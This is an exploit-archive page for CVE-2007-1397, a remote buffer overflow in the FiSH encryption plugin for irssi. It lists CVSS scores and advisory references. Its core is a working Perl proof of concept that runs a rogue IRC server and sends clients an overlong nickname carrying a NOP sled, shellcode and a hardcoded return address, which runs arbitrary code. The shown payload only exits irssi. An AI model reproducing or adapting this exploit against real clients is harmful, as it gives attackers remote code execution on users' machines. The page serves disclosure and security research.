FiSH-irssi v0.99 Evil ircd Buffer Overflow

2011.04.26
Credit: Caleb James DeLisle
Risk: High
Local: No
Remote: Yes
CVE: CVE-2007-1397
CWE: N/A


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# FiSH IRC encryption evil ircd PoC exploit. # Abuses CVE-2007-1397 # Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin. # Runs arbitrary code which which in this case shuts down irssi. # Tested on my own compiled FiSH with irssi/fedora/x86 # There are a lot more problems like this one, you should /unload fish # Caleb James DeLisle - cjd use Socket; $retPtr = "\x60\xef\xff\xbf"; # Pirated from some guy called gunslinger_ $exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80"; $code = "\x90" x 120 . $exit1code . $retPtr; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket"; bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667"; listen(SOCKET,5) or die "Couldn't listen on port"; while(accept(CLIENT,SOCKET)){ sleep 1; select((select(CLIENT), $|=1)[0]); print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n"; } close(SOCKET);

References:

http://www.vupen.com/english/advisories/2007/0910
http://www.securityfocus.com/bid/22880
http://blogs.23.nu/ilja/stories/14493/
http://xforce.iss.net/xforce/xfdb/32892
http://secunia.com/advisories/24495


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top